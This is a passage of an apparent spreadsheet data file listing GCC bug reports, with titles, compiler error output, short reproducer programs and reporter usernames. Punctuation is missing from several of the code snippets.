/home/mjordan/Blender/build/linux2/source/blender/include
ignoring duplicate directory source/blender/include
ignoring duplicate directory source/blender/imbuf
ignoring nonexistent directory
/home/mjordan/Blender/build/linux2/source/blender/render/extern/include
ignoring duplicate directory source/blender/render/extern/include
ignoring nonexistent directory
/home/mjordan/Blender/build/linux2/source/blender/renderconverter
ignoring duplicate directory source/blender/renderconverter
ignoring nonexistent directory
/home/mjordan/Blender/build/linux2/source/blender/radiosity/extern/include
ignoring duplicate directory source/blender/radiosity/extern/include
ignoring duplicate directory source/blender/blenloader
ignoring duplicate directory source/blender/python
ignoring duplicate directory source/kernel/gen_system
ignoring nonexistent directory
/home/mjordan/Blender/build/linux2/source/blender/readstreamglue
ignoring duplicate directory source/blender/readstreamglue
ignoring duplicate directory source/blender/img
ignoring nonexistent directory
/home/mjordan/Blender/build/linux2/source/blender/quicktime
ignoring duplicate directory source/blender/quicktime
ignoring duplicate directory /usr/include
  as it is a non-system directory that duplicates a system directory
ignoring duplicate directory source/blender/ftfont
#include ... search starts here:
#include  search starts here:
 intern/guardedalloc
 /home/mjordan/Blender/build/linux2/source/blender/blenlib
 source/blender/blenlib
 /home/mjordan/Blender/build/linux2/source/blender/makesdna
 source/blender/makesdna
 /home/mjordan/Blender/build/linux2/source/blender/blenkernel
 source/blender/blenkernel
 source/blender/include
 intern/bmfont
 /home/mjordan/Blender/build/linux2/source/blender/imbuf
 source/blender/imbuf
 source/blender/render/extern/include
 intern/bsp/extern
 source/blender/renderconverter
 source/blender/radiosity/extern/include
 intern/decimation/extern
 /home/mjordan/Blender/build/linux2/source/blender/blenloader
 source/blender/blenloader
 /home/mjordan/Blender/build/linux2/source/blender/python
 source/blender/python
 /home/mjordan/Blender/build/linux2/source/kernel/gen_system
 source/kernel/gen_system
 intern/SoundSystem
 source/blender/readstreamglue
 /home/mjordan/Blender/build/linux2/source/blender/img
 source/blender/img
 source/blender/quicktime
 intern/ghost
 intern/opennl/extern
 /usr/include/python2.3
 /usr/include/SDL
 /usr/X11R6/include
 /home/mjordan/Blender/build/linux2/source/blender/ftfont
 source/blender/ftfont
 /usr/local/include
 /usr/lib/gcc/i686-pc-linux-gnu/4.0.0/include
 /usr/include
End of search list.
 /usr/libexec/gcc/i686-pc-linux-gnu/4.0.0/cc1 -fpreprocessed editipo.i -quiet
-dumpbase editipo.c -march=athlon-xp -mfpmath=sse387 -msse -mmmx -m3dnow
-auxbase-strip /home/mjordan/Blender/build/linux2/source/blender/src/editipo.o
-O3 -Wno-unused-parameter -Wall -W -version -funsigned-char -fomit-frame-pointer
-ffast-math -o editipo.s
GNU C version 4.0.0 (i686-pc-linux-gnu)
        compiled by GNU C version 4.0.0.
GGC heuristics: --param ggc-min-expand=63 --param ggc-min-heapsize=62519
source/blender/src/editipo.c: In function ovekey_ipo
source/blender/src/editipo.c:4395: internal compiler error: in fold_convert at
fold-const.c:1922
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>rperini</t>
  </si>
  <si>
    <t>GCC-17231</t>
  </si>
  <si>
    <t>verification error 3.4.1/3.5 : compile .class with embedded try blocks</t>
  </si>
  <si>
    <t>gcc 3.4.1 or gcc version 3.5.0 20040730
javac tran.java
gcj -c tran.class
tran.java: In class `tran':
tran.java: In method `tran.x()':
tran.java:10: error: verification error at PC=5
tran.java:10: error: label part of different subroutines
class tran {
     public int x() {
          try {
               try {
                    return 5
               } finally {
               }
          } finally {
          }
     }
}</t>
  </si>
  <si>
    <t>eclipse.lists</t>
  </si>
  <si>
    <t>GCC-79284</t>
  </si>
  <si>
    <t>[7 Regression] ICE on valid code at -O3 on x86_64-linux-gnu: verify_gimple failed</t>
  </si>
  <si>
    <t>This seems to be a recent regression. 
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.1/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 7.0.1 20170130 (experimental) [trunk revision 245020] (GCC)
$
$ gcc-trunk -O2 -c small.c
$
$ gcc-trunk -O3 -c small.c
small.c: In function â€˜fn1â€™:
small.c:8:6: error: type mismatch in binary expression
 void fn1 (int p)
      ^~~
vector(4) 
vector(4) 
vector(16) unsigned char
mask__5.10_9 = mask__3.9_16 ^ vect_cst__10
small.c:8:6: internal compiler error: verify_gimple failed
0xc6143f verify_gimple_in_cfg(function* bool)
        ../../gcc-source-trunk/gcc/tree-cfg.c:5266
0xb35752 execute_function_todo
        ../../gcc-source-trunk/gcc/passes.c:1966
0xb36109 execute_todo
        ../../gcc-source-trunk/gcc/passes.c:2016
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$
-------------------------------------
struct
{ 
  unsigned a:1
} b
int c[5]
void fn1 (int p)
{ 
  char e = 4 f
  for ( e e--)
    f = (c[e] 
  while (1)
    fn1 (f)
}</t>
  </si>
  <si>
    <t>GCC-49169</t>
  </si>
  <si>
    <t>ARM: optimisations strip the Thumb/ARM mode bit off function pointers</t>
  </si>
  <si>
    <t>ARM devices encode the instruction set mode in the LSB of the function address.  Functions are word aligned on ARM.  If you try to test the LSB of a function pointer then GCC assumes that the two least significant bits are zero and optimises away the test.
This problem is seen in Mono and was originally reported at:
 https://bugs.launchpad.net/ubuntu/+source/gcc-4.5/+bug/721531
A reduced test case is:
void main() {
        void *p = main
        if ((int)p 
}
When compiled with -march=armv7-a -mthumb -O0 then the word 'HIT!' will show.  When compiled with -O2 the branch is not taken.
The problem does not occur in 4.4.5.  It does occur in 4.5.2 4.6.0 and trunk r174044.</t>
  </si>
  <si>
    <t>michael.hope</t>
  </si>
  <si>
    <t>GCC-49013</t>
  </si>
  <si>
    <t>[4.7 Regression] LTO bootstrap failed with bootstrap-profiled</t>
  </si>
  <si>
    <t>On Linux/x86-64 revision 173795 gave
../../src-trunk/gcc/read-md.c: In function 'print_c_condition':
../../src-trunk/gcc/read-md.c:230:1: internal compiler error: in splice_child_die at dwarf2out.c:8274
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[7]: *** [/tmp/cc1LdCxa.ltrans2.ltrans.o] Error 1
lto-wrapper: make returned 2 exit status
/usr/local/x86_64-unknown-linux-gnu/bin/ld: lto-wrapper failed
collect2: ld returned 1 exit status
make[6]: *** [build/genpreds] Error 1
In file included from ../../src-trunk/gcc/gensupport.c:312:0
                from :82:
../../src-trunk/gcc/read-md.c: In function 'read_char':
../../src-trunk/gcc/read-md.c:517:9: internal compiler error: in splice_child_die at dwarf2out.c:8274
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[7]: *** [/tmp/ccqJAwqa.ltrans4.ltrans.o] Error 1
make[7]: *** Waiting for unfinished jobs....
lto-wrapper: make returned 2 exit status
/usr/local/x86_64-unknown-linux-gnu/bin/ld: lto-wrapper failed
collect2: ld returned 1 exit status
make[6]: *** [build/genattr] Error 1
In file included from ../../src-trunk/gcc/gensupport.c:312:0
                from :82:
../../src-trunk/gcc/read-md.c: In function 'read_char':
../../src-trunk/gcc/read-md.c:517:9: internal compiler error: in splice_child_die at dwarf2out.c:8274
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[7]: *** [/tmp/ccl8rWMa.ltrans4.ltrans.o] Error 1
make[7]: *** Waiting for unfinished jobs....
lto-wrapper: make returned 2 exit status
/usr/local/x86_64-unknown-linux-gnu/bin/ld: lto-wrapper failed
collect2: ld returned 1 exit status
make[6]: *** [build/gencodes] Error 1
In file included from ../../src-trunk/gcc/gensupport.c:312:0
                from :82:
../../src-trunk/gcc/read-md.c: In function 'read_char':
../../src-trunk/gcc/read-md.c:517:9: internal compiler error: in splice_child_die at dwarf2out.c:8274
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[7]: *** [/tmp/ccMyblKa.ltrans4.ltrans.o] Error 1
make[7]: *** Waiting for unfinished jobs....
lto-wrapper: make returned 2 exit status
/usr/local/x86_64-unknown-linux-gnu/bin/ld: lto-wrapper failed
collect2: ld returned 1 exit status
make[6]: *** [build/genconfig] Error 1
In file included from ../../src-trunk/gcc/gensupport.c:312:0
                from :82:
../../src-trunk/gcc/read-md.c: In function 'read_char':
../../src-trunk/gcc/read-md.c:517:9: internal compiler error: in splice_child_die at dwarf2out.c:8274
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[7]: *** [/tmp/ccxpFOla.ltrans5.ltrans.o] Error 1
make[7]: *** Waiting for unfinished jobs....
lto-wrapper: make returned 2 exit status
/usr/local/x86_64-unknown-linux-gnu/bin/ld: lto-wrapper failed
collect2: ld returned 1 exit status
make[6]: *** [build/genflags] Error 1
In file included from ../../src-trunk/gcc/gensupport.c:320:0
                from :86:
../../src-trunk/gcc/read-md.c: In function 'read_char':
../../src-trunk/gcc/read-md.c:487:9: internal compiler error: in splice_child_die at dwarf2out.c:8274
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[7]: *** [/tmp/cc0kEiJc.ltrans4.ltrans.o] Error 1
make[7]: *** Waiting for unfinished jobs....
In file included from ../../src-trunk/gcc/read-md.c:344:0
                from :89:
../../src-trunk/gcc/read-md.c: In function 'read_char':
../../src-trunk/gcc/read-md.c:332:9: internal compiler error: in splice_child_die at dwarf2out.c:8274
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
lto1: internal compiler error: in splice_child_die at dwarf2out.c:8274
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
profiling:/export/gnu/import/svn/gcc-test-profile/bld/libiberty/filename_cmp.gcda:Invocation mismatch - some data files may have been removedprofiling:/export/gnu/import/svn/gcc-test-profile/bld/gcc/insn-recog.gcda:Invocation mismatch - some data files may have been removedmake[7]: *** [/tmp/cc0kEiJc.ltrans6.ltrans.o] Error 1
make[7]: *** [/tmp/cc0kEiJc.ltrans8.ltrans.o] Error 1
lto-wrapper: make returned 2 exit status
/usr/local/x86_64-unknown-linux-gnu/bin/ld: lto-wrapper failed
collect2: ld returned 1 exit status
make[6]: *** [build/genattrtab] Error 1
rm gcj-dbtool.pod jcf-dump.pod jv-convert.pod grmic.pod gcov.pod gcj.pod gc-analyze.pod gij.pod gcc.pod gfortran.pod cpp.pod fsf-funding.pod gfdl.pod
make[6]: Leaving directory `/export/gnu/import/svn/gcc-test-profile/bld/gcc'
make[5]: *** [all-stagefeedback-gcc] Error 2
make[5]: Leaving directory `/export/gnu/import/svn/gcc-test-profile/bld'
make[4]: *** [stagefeedback-bubble] Error 2
make[4]: Leaving directory `/export/gnu/import/svn/gcc-test-profile/bld'
make[3]: *** [profiledbootstrap] Error 2
make[3]: Leaving directory `/export/gnu/import/svn/gcc-test-profile/bld'
7956.81user 360.64system 29:33.19elapsed 469%CPU (0avgtext+0avgdata 1530944maxresident)k
372728inputs+9056440outputs (6708major+75997372minor)pagefaults 0swaps
make[2]: *** [profiledbootstrap] Error 2
make[2]: Leaving directory `/export/gnu/import/svn/gcc-test-profile'
when configured with
--enable-clocale=gnu --with-system-zlib --enable-shared --with-demangler-in-ld --enable-cloog-backend=isl --with-ppl-include=/opt/gnu/include --with-ppl-lib=/opt/gnu/lib64 --with-cloog-include=/opt/gnu/include --with-cloog-lib=/opt/gnu/lib64 --with-build-config=bootstrap-lto --with-fpmath=sse --enable-languages=cc++fortranjavaltoobjc
Revision 173790 is OK.</t>
  </si>
  <si>
    <t>GCC-8227</t>
  </si>
  <si>
    <t>[3.3 regression] g++ 3.3: ctors not called in static array initialization</t>
  </si>
  <si>
    <t>For the initialization of the static array in the program
below we generate calls to the class destructor but there
are no corresponding calls to the constructor.
This is what i get when i run this program:
$ g++ -o x x.cc
$ ./x
dtor 804973c
$
If i change the program so that Cls is not a template class
then it executes correctly.
Release:
3.3 20021014 (experimental)
Environment:
System: Linux karma 2.4.19-emp_2419p5a829i #1 Tue Sep 3 17:42:17 EST 2002 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --prefix=/usr/local/gcc --enable-threads=posix --enable-long-long --enable-languages=cc++f77
How-To-Repeat:
------------------------
extern C int printf (const char* ...)
template 
struct Cls
{
  Cls () { printf (ctor %x\n this) }
  ~Cls () { printf (dtor %x\n this) }
}
static Cls xxx[1]
int main ()
{
  return 0
}
------------------------</t>
  </si>
  <si>
    <t>GCC-50825</t>
  </si>
  <si>
    <t>[4.7 regression] bootstrap fails at stage1 libgcc from r180302</t>
  </si>
  <si>
    <t>/GCC/gcc-4-7-id9-id9-pd9/./gcc/xgcc -B/GCC/gcc-4-7-id9-id9-pd9/./gcc/ -B/GCC/gcc-4-7-id9xpd9/powerpc-apple-darwin9/bin/ -B/GCC/gcc-4-7-id9xpd9/powerpc-apple-darwin9/lib/ -isystem /GCC/gcc-4-7-id9xpd9/powerpc-apple-darwin9/include -isystem /GCC/gcc-4-7-id9xpd9/powerpc-apple-darwin9/sys-include    -g -O2 -O2  -I. -I. -I/GCC/gcc-live-trunk/gcc -I/GCC/gcc-live-trunk/gcc/. -I/GCC/gcc-live-trunk/gcc/../include -I/GCC/gcc-live-trunk/gcc/../libdecnumber -I/GCC/gcc-live-trunk/gcc/../libdecnumber/dpd -I../libdecnumber -I/GCC/gcc-live-trunk/gcc/../libgcc -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include  -Wa-force_cpusubtype_ALL -pipe -mmacosx-version-min=10.4 -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -fbuilding-libgcc -fno-stack-protector  -mlong-double-128 -I. -I. -I../.././gcc -I/GCC/gcc-live-trunk/libgcc -I/GCC/gcc-live-trunk/libgcc/. -I/GCC/gcc-live-trunk/libgcc/../gcc -I/GCC/gcc-live-trunk/libgcc/../include  -DHAVE_CC_TLS -DUSE_EMUTLS -o _popcountdi2_s.o -MT _popcountdi2_s.o -MD -MP -MF _popcountdi2_s.dep -DSHARED -DL_popcountdi2 -c /GCC/gcc-live-trunk/libgcc/../gcc/libgcc2.c 
/GCC/gcc-live-trunk/libgcc/../gcc/libgcc2.c: In function â€˜__popcountdi2â€™:
/GCC/gcc-live-trunk/libgcc/../gcc/libgcc2.c:848:1: internal compiler error: in rs6000_adjust_cost at config/rs6000/rs6000.c:22865
==
my ppc machine is tied up at the moment - but this is easily demonstrable from a cross.</t>
  </si>
  <si>
    <t>GCC-17991</t>
  </si>
  <si>
    <t>[4.0 Regression] Two-process fixincludes broken: pz_mn_name_pat undefined</t>
  </si>
  <si>
    <t>This patch appears to have broken two-process fixincludes: 
.  When attempting to 
link applyfix.exe link fails because pz_mn_name_pat is undefined.
The two-process mode is only used for MS-DOS and BeOS which is probably why 
noone noticed.  I noticed because it appears that other than this and some 
other soon-to-be-fixed problems two process fixincludes also works for 
Windows.
The problem is that mn_name_pat was made into an environment variable which 
are only defined in fixincl.c which is only included in the fixincl 
executable.  However it is used in fixlib.c which is included in the 
applyfix executable in a two-process build.
As I'm not really familiar with fixincludes I can't say how this should be 
fixed.  It can be worked around by copying the environment variable 
definitions and initializations from fixincl.c to the SEPARATE_FIX_PROC 
section of fixfixes.c but I'm not sure this is appropriate as applyfix 
doesn't need any of these environment variables otherwise.  Perhaps just this 
single environment variable could be defined.</t>
  </si>
  <si>
    <t>aaronavay62</t>
  </si>
  <si>
    <t>GCC-2373</t>
  </si>
  <si>
    <t>Exception rethrow in function-try-block</t>
  </si>
  <si>
    <t>#include 
// ISO-IEC-14882 stated in Â§15.3-16: The exception being handled is rethrown
// if control reaches the end of a handler of the function-try-block of
// a constructor or destructor.
class X
{
 public:
  X ()
  try
  {
    throw int ()
  }
  catch (...)
  {
    // No rethrow! Violates with ISO-IEC-14882 Â§15.3-16.
    // Same happens for destructor.
  }
}
int main ()
try
{
  X x
}
catch (...)
{
  std::cerr &lt;&lt; catched exception\n
}
Release:
gcc version 2.95.2 19991024 (release)
Environment:
FreeBSD 4.1-RELEASE</t>
  </si>
  <si>
    <t>frank.uepping</t>
  </si>
  <si>
    <t>GCC-38081</t>
  </si>
  <si>
    <t>time_get::do_get_weekday does not always recognize full names of weekdays</t>
  </si>
  <si>
    <t>The description of time_get::do_get_weekday() and time_get::do_get_monthname() states (22.2.5.1.2): 
Effects: Reads characters starting at s until it has extracted the (perhaps abbreviated) name of a weekday or month. If it finds an abbreviation that is followed by characters that could match a full name it continues reading until it matches the full name or fails. 
However if the abbreviated name of a weekday is not a prefix of its full name the full name is not recognized by the function. 
For example the Russian name of Monday (Ponedelnik) is not recognized as Monday (locale - ru_RU.iso88595) because of this. But if one replaces the 1st 3 symbols of this word with the abbreviated Russian name of Monday (Pnd) the resulting string (Pndedelnik) is recognized as the full name of Monday which is wrong. 
According to the source of time_get::do_get_weekday function's implementation as well as the comments in it it is definitely assumed in the function that the abbreviated name of a weekday should be a prefix of its full name. 
A similar problem takes place for time_get::do_get_monthname() function.</t>
  </si>
  <si>
    <t>tsyvarev</t>
  </si>
  <si>
    <t>GCC-34773</t>
  </si>
  <si>
    <t>[4.3 Regression] miscompilation of vfprintf_r</t>
  </si>
  <si>
    <t>See attachment vf.i.
The bug manifests in code roughly corresponding to the code snippet:
union double_union
{
  double d
  __uint32_t i[2]
}
union double_union tmp tmp.d = value
 if ((tmp.i[1]) &amp; ((__uint32_t)0x80000000L)) {
  value = -value
  *sign = '-'
 } else
  *sign = '\000'
As manifested by the 142.fwprop1 dump compared to 141.cse1 dump fwprop1 has changed
(note 628 627 630 101 [bb 101] NOTE_INSN_BASIC_BLOCK)
(insn 630 628 632 101 vf.i:1270 (set (reg:SI 277)
        (const_int -2147483648 [0xffffffff80000000])) 38 {*movsi_internal} (nil))
(insn 632 630 629 101 vf.i:1270 (clobber (reg/v:DF 77 [ __x.739 ])) -1 (insn_list:REG_LIBCALL 631 (nil)))
(insn 629 632 631 101 vf.i:1270 (set (subreg:SI (reg/v:DF 77 [ __x.739 ]) 0)
        (subreg:SI (reg/v:DF 152 [ __x ]) 0)) 38 {*movsi_internal} (expr_list:REG_NO_CONFLICT (reg/v:DF 152 [ __x ])
        (nil)))
(insn 631 629 633 101 vf.i:1270 (set (subreg:SI (reg/v:DF 77 [ __x.739 ]) 4)
        (xor:SI (subreg:SI (reg/v:DF 152 [ __x ]) 4)
            (reg:SI 277))) 155 {xorsi3} (insn_list:REG_RETVAL 632 (expr_list:REG_NO_CONFLICT (reg/v:DF 152 [ __x ])
            (nil))))
into:
(note 628 627 631 103 [bb 103] NOTE_INSN_BASIC_BLOCK)
(insn 631 628 633 103 vf.i:1270 (set (subreg:SI (reg/v:DF 77 [ __x.739 ]) 4)
        (plus:SI (subreg:SI (reg/v:DF 152 [ __x ]) 4)
            (const_int -2147483648 [0xffffffff80000000]))) 75 {*addsi3_non_v32} (expr_list:REG_NO_CONFLICT (reg/v:DF 152 [ __x ])
        (nil)))
(insn 633 631 634 103 vf.i:1270 (set (reg/v:QI 161 [ softsign ])
        (const_int 45 [0x2d])) 47 {movqi} (nil))
(code_label 634 633 635 104 86  [0 uses])
thereby making the lower part of the mantissa in (reg:DF 77) undefined and the bug manifestation depending on stack contents.
Trunk of 130734 was used for the dump above.</t>
  </si>
  <si>
    <t>GCC-29095</t>
  </si>
  <si>
    <t>[4.0/4.1/4.2 Regression] cxxabi.h __cxa_cdtor_type not declared when included from C</t>
  </si>
  <si>
    <t>#ifdef __cplusplus
namespace __cxxabiv1
{
  typedef __cxa_cdtor_return_type (*__cxa_cdtor_type)(void *)
  extern C
  {
#endif
  // Allocate array.
  void*
  __cxa_vec_new(size_t __element_count size_t __element_size
                size_t __padding_size __cxa_cdtor_type constructor
                __cxa_cdtor_type destructor)
When the above snippet from cxxabi.h gets parsed as C then __cxa_cdtor_type won't be defined the declaration needs to move out of the #ifdef to inside the extern C part.</t>
  </si>
  <si>
    <t>jaco</t>
  </si>
  <si>
    <t>GCC-6761</t>
  </si>
  <si>
    <t>setlocale() is called improperly in locale_facets.tcc</t>
  </si>
  <si>
    <t xml:space="preserve">__convert_from_v defined in
libstdc++-v3/include/bits/locale_facets.tcc temporarily modifies the
locale before calling snprintf but it does it wrong.  Specifically
this code:
      const char* __old = setlocale(LC_ALL C)
      if (__prec &gt;= 0)
        __ret = snprintf(__out __size __fmt __prec __v)
      else
        __ret = snprintf(__out __size __fmt __v)
      setlocale(LC_ALL __old)
is incorrect because the first call to setlocale() returns the NEW
locale not the old locale.  This is correct behavior of setlocale().
The second argument should be NULL in order to query the current
locale.  The first line above should be replaced with these two lines
(I'm attaching a proper patch as well):
      const char* __old = setlocale(LC_ALL 0)
      setlocale(LC_ALL C)
Note that I have marked this as critical because as far as I can
tell this renders locale support in conjunction with iostream
useless.  Although a workaround exists (resetting the locale after
each call that messes it up) this isn't practical.  For me this is
enough of a show stopper that I have decided to stay with 3.0.4 for
the time being.
Release:
3.1
Environment:
System: Linux soup.in.ql.org 2.4.18-4 #1 Thu May 2 18:06:25 EDT 2002 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-3.1/configure --prefix=/usr/apex/gcc-3.1 --enable-threads=posix
How-To-Repeat:
The __convert_from_v function is called when outputing an integer to
an ostream.  The following example code illustrates the problem.  As
per instructions I'm including the preprocessed file as well but the
original code with #includes is more instructive so I'll start with
that.
See attachments for locale.cc
When the above is compiled with g++ from 3.1 and run as
LC_ALL=en_US ./a.out
the output:
initial: C
set: en_US
before cout: en_US
1
after: C
is generated.  When run compiled with g++ from 3.0.4 and run the same
way this corrected output is generated:
initial: C
set: en_US
before cout: en_US
1
after: en_US
Here is the preprocessed output:
See attachments for locale.ii.bz2
</t>
  </si>
  <si>
    <t>GCC-49518</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE in vect_enhance_data_refs_alignment at tree-vect-data-refs.c:1555</t>
  </si>
  <si>
    <t>[regehr@gamow tmp032]$ current-gcc -v
Using built-in specs.
COLLECT_GCC=current-gcc
COLLECT_LTO_WRAPPER=/uusoc/exports/scratch/regehr/z/compiler-install/gcc-r175350-install/bin/../libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../configure --with-libelf=/usr/local --enable-lto --prefix=/home/regehr/z/compiler-install/gcc-r175350-install --program-prefix=r175350- --enable-languages=cc++
Thread model: posix
gcc version 4.7.0 20110623 (experimental) (GCC) 
[regehr@gamow tmp032]$ 
[regehr@gamow tmp032]$ 
[regehr@gamow tmp032]$ 
[regehr@gamow tmp032]$ current-gcc -O3 small.c -c
small.c: In function 'un_':
small.c:13:5: internal compiler error: in vect_enhance_data_refs_alignment at tree-vect-data-refs.c:1555
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
[regehr@gamow tmp032]$ 
[regehr@gamow tmp032]$ 
[regehr@gamow tmp032]$ 
[regehr@gamow tmp032]$ 
[regehr@gamow tmp032]$ cat small.c
struct S1
{
  int f4
  int f5
  int f9
}
int *zz
struct S1 g_40
struct S1 g_69
int g_79
int un_ (struct S1 **p_ int p_6 char p_66)
{
  char l_76[] = { 0 0 0 0 1 }
  for (g_40.f4 = 1 g_40.f4 g_40.f4 += 1)
    {
      int *l_78 = 
      *l_78 = l_76[g_40.f4]
      if (zz)
	return 1
      *l_78 = p_66 &gt;= g_40.f9
      if (g_69.f5)
	break
    }
  return 0
}</t>
  </si>
  <si>
    <t>GCC-28113</t>
  </si>
  <si>
    <t>[4.2 Regression] vectors initialized in ctors not at  compile time cause altivec-3.C failure</t>
  </si>
  <si>
    <t>Test g++.dg/ext/altivec-3.C has been failing for mainline on powerpc64-linux systems without VMX hardware since this patch a fix for PR20103 was added:
  http://gcc.gnu.org/viewcvs?view=rev&amp;rev=114119
  r114119 | mmitchel | 2006-05-25 20:18:26 +0000 (Thu 25 May 2006)
The test calls a function at runtime to determine if VMX hardware is available and if not skips the rest of the test.  It now fails because vector global variables are initialized by constructors instead of at compile time.  Here's a minimal example:
  __vector signed int vsi = (__vector signed int) {40 41 42 43}
  int main () { return 0 }
If the new behavior is expected then I'll change the test to be compile-only on
systems without VMX hardware.</t>
  </si>
  <si>
    <t>GCC-63189</t>
  </si>
  <si>
    <t>[4.8 Regression] Incorrect results from trivial loop when optimized with O3 or O2+tree vectorization</t>
  </si>
  <si>
    <t>The following code runs two identical loops with the exception that one variable is marked as volatile:
#include 
short int srcdata[16] = { 0 0 0 0 0 0 0 100000000 }
int main(int argc char **argv)
{
  int hix= 8
  int j
  volatile int  s1ref = 0
  for(j = 0 j &lt; hix j++){ s1ref += srcdata[j]*j}
  int s1=0
  for(j = 0 j &lt; hix j++) { s1 += srcdata[j]*j}
  printf(s1ref=%d s1=%d\ns1refs1)
}
I would expect the results to be identical for s1ref and s1 under all compilation options however when compiling with O3 or O2 with -ftree-vectorization I get incorrect results for S1:
bms20@arthas:/tmp$ gcc -O2 test.c &amp;&amp; ./a.out
s1ref=7 s1=7
bms20@arthas:/tmp$ gcc -O3 test.c &amp;&amp; ./a.out
s1ref=7 s1=1
bms20@arthas:/tmp$ gcc -O2 -ftree-vectorize test.c &amp;&amp; ./a.out
s1ref=7 s1=1
bms20@arthas:/tmp$
Changing the type of srcdata to integers or unsigned shorts appears to fix the problem however this is producing incorrect results with signed shorts.
It appears that the vector code is incorrect from examining the .s files produced.
SETUP SPECIFICS:
Exact version of GCC:
bms20@arthas:/tmp$ gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.8/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 4.8.2-19ubuntu1' --with-bugurl=file:///usr/share/doc/gcc-4.8/README.Bugs --enable-languages=cc++javagodfortranobjcobj-c++ --prefix=/usr --program-suffix=-4.8 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.8 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --disable-libmudflap --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.8-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.8-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.8-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64mx32 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) 
System type:
Ubuntu Linux 14.04 running on x86_64.</t>
  </si>
  <si>
    <t>GCC-35739</t>
  </si>
  <si>
    <t>[4.3/4.4 regression] ICE with _Decimal128 and va_list</t>
  </si>
  <si>
    <t>The following valid code snippet triggers an ICE since GCC 4.3.0
when compiled with -fmudflap -O:
=========================================
_Decimal128 foo(int n ...)
{ 
  int i
  _Decimal128 j
  __builtin_va_list va
  __builtin_va_start(van)
  for (i = 0 i &lt; n i++)
    j += __builtin_va_arg(va_Decimal128)
  __builtin_va_end(va)
  return j
}
=========================================
bug.c: In function 'foo':
bug.c:2: error: invalid operand to binary operator
bug.c:2: internal compiler error: verify_stmts failed
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-9085</t>
  </si>
  <si>
    <t>Unable to find register to spill when optimizing</t>
  </si>
  <si>
    <t>Compiler says unable to find a register to spill in class `AREG' for attached code when compiled with following flags:
-c -Os -mregparm=2 -fschedule-insns -march=k6
(it works when any of these flags are omitted)
Release:
gcc version 3.2 20020927 (prerelease)
Environment:
cygwin with latest GCC port perhaps also others
How-To-Repeat:
gcc -c -Os -mregparm=2 -fschedule-insns -march=k6 try.cpp</t>
  </si>
  <si>
    <t>j.vanbemmel</t>
  </si>
  <si>
    <t>GCC-43540</t>
  </si>
  <si>
    <t>ICE: vector VEC(dw_cfi_refheap) grow domain error in output_cfis at dwarf2out.c:3346 or OOM-killed</t>
  </si>
  <si>
    <t>Command line:
$ CXX=/mnt/svn/gcc-trunk/binary-157723-lto/bin/g++
$ FLAGS=-O1 -freorder-blocks-and-partition -ftree-vectorize -fgraphite-identity -m32 -mstackrealign
$ $CXX -fprofile-arcs $FLAGS testcase.c
$ ./a.out
$ $CXX -fprofile-use $FLAGS testcase.c
testcase.c: In function 'int test_for2(int int)':
testcase.c:10:1: internal compiler error: vector VEC(dw_cfi_refheap) grow domain error in output_cfis at dwarf2out.c:3346
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The worse situation is when gcc is OOM-killed or shows error message about not being able to allocate (random big number) bytes of memory:
cc1plus: out of memory allocating 1305533456 bytes after a total of 0 bytes
What happens is random but echo 0 &gt; /proc/sys/kernel/randomize_va_space seems to prevent the random behaviour.
Tested revisions:
r157723 - crash
r157460 - crash
r157326 - crash
r157161 - OK
r156293 - OK
r153685 - OK
Valgrind doesn't show any warning</t>
  </si>
  <si>
    <t>GCC-79472</t>
  </si>
  <si>
    <t>[8 Regression] x86-64: Switch table generation fails if default case has different code</t>
  </si>
  <si>
